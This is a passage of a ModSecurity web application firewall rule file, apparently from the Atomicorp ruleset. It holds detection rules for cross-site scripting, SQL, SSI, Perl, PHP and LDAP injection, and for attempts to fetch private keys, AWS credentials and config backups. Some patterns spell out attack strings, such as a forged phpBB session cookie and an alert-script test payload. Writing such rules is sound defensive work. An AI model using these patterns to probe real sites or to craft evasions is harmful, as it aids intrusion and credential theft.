pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:/^_qf_/|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:/^site_/|!ARGS:/translation/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:/embed/|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:/solution/|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:/submenu/|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/senior/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(?:ht|f)tps?)\:/|(?:alert|document\.write) ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|< ?/?i?frame|\' ?\} ?\) ?;)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,multiMatch,chain"
SecRule MATCHED_VARS "!@rx ((?:submit(?:\+| )?(request)?(?:\+| )?>+|<<(?:\+| )remove|(?:sign ?in|log ?(?:in|out)|next|add|envoyer|modifier|select|continue|weiter|account|results)(?:\+| )?>+)$|^< ?\??(?: |\+)?xml|^<samlp|^>> ?$)"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"
#SecRule MATCHED_VARS "!((submit(\+| )?(request)?(\+| )?>>$|<<(\+| )remove|(sign ?in|login|next|add|continue|weiter|account|results)?(\+| )?>>)$|^< ?\??( |\+)?xml|^<samlp)"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"

SecMarker END_XSS_ATTACKS_D2


SecMarker END_XSS_ATTACKS_2

# Rule 380000: phpbb Session Cookie
#SecRule REQUEST_COOKIES:sessionid|REQUEST_URI|ARGS|REQUEST_BODY  "phpbb2mysql_data=a\x3A2\xaa\x7bs\x3A11\x3A\x22autologinid\x22\x3bb\x3A1\x3bs\x3A6\x3A\x22userid\x22\x3bs\x3A1\x3A\x222\x22\x3b\x7d" 	"id:380000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack'"

SecRule REQUEST_URI|ARGS|REQUEST_BODY|!ARGS:areas|!ARGS:templatecode "@pm 3A 3D 3C 3E 6F 4F x72 x52 x27" "id:333843,phase:2,t:none,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334390,t:none,pass,nolog,noauditlog,skipAfter:END_MISC_CHECKS"

# Rule 380002: schema overflow attempt
SecRule REQUEST_URI|ARGS|!ARGS:areas|!ARGS:templatecode "\|3A\|///^[^\/]{14,}?\x3A\/\/" "phase:2,deny,log,auditlog,status:403,t:none,id:380002,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack'"

SecRule REQUEST_URI "(?:/admin/artwork/index/upload_file|^/back/index\.php\?controller=admin|^/eprocservice/supplierinboundservice|^/manage/[a-z0-9]+/edit/|^/[a-z0-9/]+?\?fl_builder)" "phase:2,id:334392,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_380006"

# Rule 380006: XSS generic sig
SecRule REQUEST_URI|ARGS|!ARGS:slider|!ARGS:areas|!ARGS:templatecode|!ARGS:element|!ARGS:payment-details-data|!ARGS:/message/|!ARGS:/^widget-text/|!ARGS:message|!ARGS:text|!ARGS:filecontent|!ARGS:/descrip/|!ARGS:wpTextbox1 "/(\x3D|=)[^\n]*(\x3C|<)[^\n]+(\x3E|>)" "phase:2,capture,deny,log,auditlog,status:403,t:none,id:380006,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: XSS Generic attack',logdata:'%{TX.0}'"
SecMarker END_380006

# Rule 380007: generic SQL injection sigs using PCRE
SecRule REQUEST_URI "!(/immagini/)"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:lowercase,id:380007,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: SQL Inject Generic signature',tag:'SQLi'"
SecRule REQUEST_URI|ARGS|!ARGS:areas|!ARGS:templatecode "/\w*(\x27|\’)(\x6f|o|\x4f)(\x72|r|\x52).*!(\.(jpe?g|png|bmp|gif|mpe?g|avi|flv|wmv|ico)$)" 

SecMarker END_MISC_CHECKS


################### SSI injection #############################
#
SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!ARGS:areas|!ARGS:/template/ "@pm echo exec printenv include cmd" "id:333844,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334391,t:none,pass,nolog,noauditlog,skipAfter:END_SSI_ATTACKS"

SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!ARGS:areas|!ARGS:templatecode|!ARGS:/description/|!ARGS:/text/|!ARGS:/message/|!ARGS:/msg/|!ARGS:content "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: SSI injection Attack',id:'380016',rev:3,logdata:'%{TX.0}',severity:'2'"
#SecRule REQUEST_HEADERS|XML:/* "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)"         "phase:2,capture,t:none,t:htmlEntityDecode,t:lowercase,status:501,msg:'Atomicorp.com WAF Rules: SSI injection Attack',id:'380017',logdata:'%{TX.0}',severity:'2'"
#
SecMarker END_SSI_ATTACKS

################### PERL injection #############################
##
#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:333845,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PERL_INJECTION_3
#
#SecRule ARGS|REQUEST_URI|XML:/* "@pm .pl |( =* ))"        "id:333846,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
#        SecAction phase:2,id:334392,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_INJECTION_1
#
#SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:/jform/ "(?:\.pl\?\w+=\w?\|\w+;)|(?:\|\(\w+=\*)|(?:\*\s*\)+\s*;)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Perl echo shellcode injection',id:380021,rev:2,logdata:'%{TX.0}',severity:'2',"
#SecMarker END_PERL_INJECTION_1
#
#SecRule ARGS|REQUEST_URI_RAW|XML:/* "@pm .pl |( =* ))"        "id:333847,phase:2,t:none,t:replaceComments,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
#        SecAction phase:2,id:334393,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_INJECTION_2
#
#SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:/jform/ "(?:\.pl\?\w+=\w?\|\w+;)|(?:\|\(\w+=\*)|(?:\*\s*\)+\s*;)" "phase:2,deny,status:403,capture,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Perl echo shellcode injection',id:380022,rev:2,logdata:'%{TX.0}',severity:'2',"
#SecMarker END_PERL_INJECTION_2
#
#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "@pm .pl |( =* ))"        "id:333848,phase:2,t:none,pass,nolog,noauditlog,skip:1"
#        SecAction phase:2,id:334394,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_INJECTION_3
#
#SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:/jform/ "(?:\.pl\?\w+=\w?\|\w+;)|(?:\|\(\w+=\*)|(?:\*\s*\)+\s*;)" "phase:2,deny,status:403,capture,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Perl echo shellcode injection',id:380121,rev:2,logdata:'%{TX.0}',severity:'2',"
#SecMarker END_PERL_INJECTION_3

#Simple PHP injection rules
##TODO: Add in more exclusions
#code injection attempt
#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "< ?[?%] ?php ?.*[\"\(@]" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: PHP code injection attempt',id:340852,rev:1,logdata:'%{TX.0}',severity:'2'"
#
##code injection attempt
#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "< ?[?%] ?php ?.*[\"\(@]" "t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: PHP code injection attempt - base64 encoded',id:340853,rev:1,logdata:'%{TX.0}',severity:'2'"
#
##code injection attempt
#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "< ?[?%] ?php ?.*[\"\(@]" "t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: PHP code injection attempt - hex encoded',id:340854,rev:1,logdata:'%{TX.0}',severity:'2'"

Secrule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:346358,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_340213"
#LDAP injection
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/QTA_Tracker/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|QUERY_STRING|ARGS_NAMES|ARGS|XML:/*|!ARGS:html|!ARGS:source|!ARGS:/newpw/|!ARGS:/oldpw/|!ARGS:/bps_customcode/|!ARGS:/pass/|!ARGS:snippet|!ARGS:template_data|!ARGS:notes|!ARGS:/search_pattern/|!ARGS:filecontent|!ARGS:actionFilter|!ARGS:/password/|!ARGS:/pwd/|!ARGS:/deny/|!ARGS:/^pass/|!ARGS:m1_contents|!ARGS:/jform/|!ARGS:prefix|!ARGS:suffix|!ARGS:content|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/text/|!ARGS:/wp_autosave/|!ARGS:/^install/|!ARGS:/message/|!ARGS:/msg/|!ARGS:txt|!ARGS:form "(?:\((?:\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\b\W*?=|[^\w\x80-\xFF]*?[\!\&\|][^\w\x80-\xFF]*?\()|\)[^\w\x80-\xFF]*?\([^\w\x80-\xFF]*?[\!\&\|])" "phase:2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Atomicorp.com WAF Rules: LDAP Injection Attack',id:'340213',rev:8,logdata:'%{TX.0}',severity:'2'"

SecMarker END_340213

#Information LEakage rules
SecRule REQUEST_FILENAME "@pm ~ .bak .vscode .old .orig .copy .backup .sw .mdb vi.recover vim.recover sql config .save private-key privatekey id_rsa id_dsa .pem " "id:333849,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334395,t:none,pass,nolog,noauditlog,skipAfter:END_LEAKAGE_1"

#wordpress and other backup php config files
SecRule REQUEST_FILENAME "(wp-)?config\.(php)?\.(?:bac?k|o(?:ld|rig)|copy|tmp|s(?:ave|wp)|vim?\.|~)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390597,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup system/application config file (disable this rule only if you want to allow anyone access to these backup files)'"

SecRule REQUEST_FILENAME "[a-z0-9]~$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390581,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)'"

SecRule REQUEST_FILENAME "(?:\.bak|\.bak\.php)$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390582,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)'"

SecRule REQUEST_FILENAME "\.old$" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390583,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)'"

SecRule REQUEST_FILENAME "debug\.log$" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390784,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access debug log file (disable this rule if you require access to files that end with debug.log)'"

SecRule REQUEST_FILENAME "\.log$" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390786,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access log file (disable this rule if you require access to files that end with .log)'"

SecRule REQUEST_FILENAME "\.orig$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390584,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)'"

SecRule REQUEST_FILENAME "\.copy$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390586,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)'"

SecRule REQUEST_FILENAME "\.sw(?:f|d|z)$" "id:367888,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,pass,skipAfter:END_SWF"

SecRule REQUEST_FILENAME "\.sw[a-z]$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390587,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)'"
SecMarker END_SWF

SecRule REQUEST_FILENAME "\.backup$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390588,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)'"

SecRule REQUEST_FILENAME "\.mdb$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390589,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .mdb)'"

SecRule REQUEST_FILENAME "vim?\.recover" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350589,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access vi recovery file (disable this rule if you require access to files that end with .mdb)'"

SecRule REQUEST_FILENAME "\.sql(?:$|\.(?:zip|(?:t|r)ar\.?g?z?|t?(?:g|b)z|old|ba(?:k|c)u?p?)$)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350590,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)'"

SecRule REQUEST_FILENAME "(?:id_(?:r|d)sa$|key\.pem$|(?:myserver|private-?key)\.key$)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350591,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys'"

SecRule REQUEST_FILENAME "(?:ecs\.config|cloudwatch\.cred)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350592,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access AWS credentials'"

SecRule REQUEST_FILENAME "\.vscode/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350593,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access stored vscode passwords'"

SecMarker END_LEAKAGE_1

SecRule RESPONSE_BODY "@pm ---ASL-CONFIG-FILE--- Horde:" "id:333850,phase:4,t:none,pass,nolog,noauditlog,skip:1"
        SecAction "phase:4,id:334396,t:none,pass,nolog,noauditlog,skipAfter:END_LEAKAGE_2"

#prevents exposure of ASL config files on customer machine
SecRule RESPONSE_BODY "---ASL-CONFIG-FILE---" "deny,log,auditlog,phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: ASL Configuration Leak Prevented',id:'380013',severity:'2',rev:1"

#prevents exposure of ASL config files on customer machine
SecRule RESPONSE_BODY "<title>Horde: System Capabilities Test</title>" "deny,log,auditlog,phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Horde system configuration Leak Prevented',id:'360013',severity:'2',rev:1"

SecMarker END_LEAKAGE_2

#Rules to catch attack tools
#generic XSS test pattern
#>:<script>alert(12345)</script>

#Postive rules for GUI
SecRule SERVER_PORT "@streq 30000" "phase:2,deny,log,auditlog,status:403,t:none,id:393585,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: XSS attack on ASL GUI',chain"
SecRule ARGS:event "!@rx ^[a-z_]+$" "t:none,t:lowercase"

#special exclusions for this rule file




#



#below, ARGS:grossprofit case #3668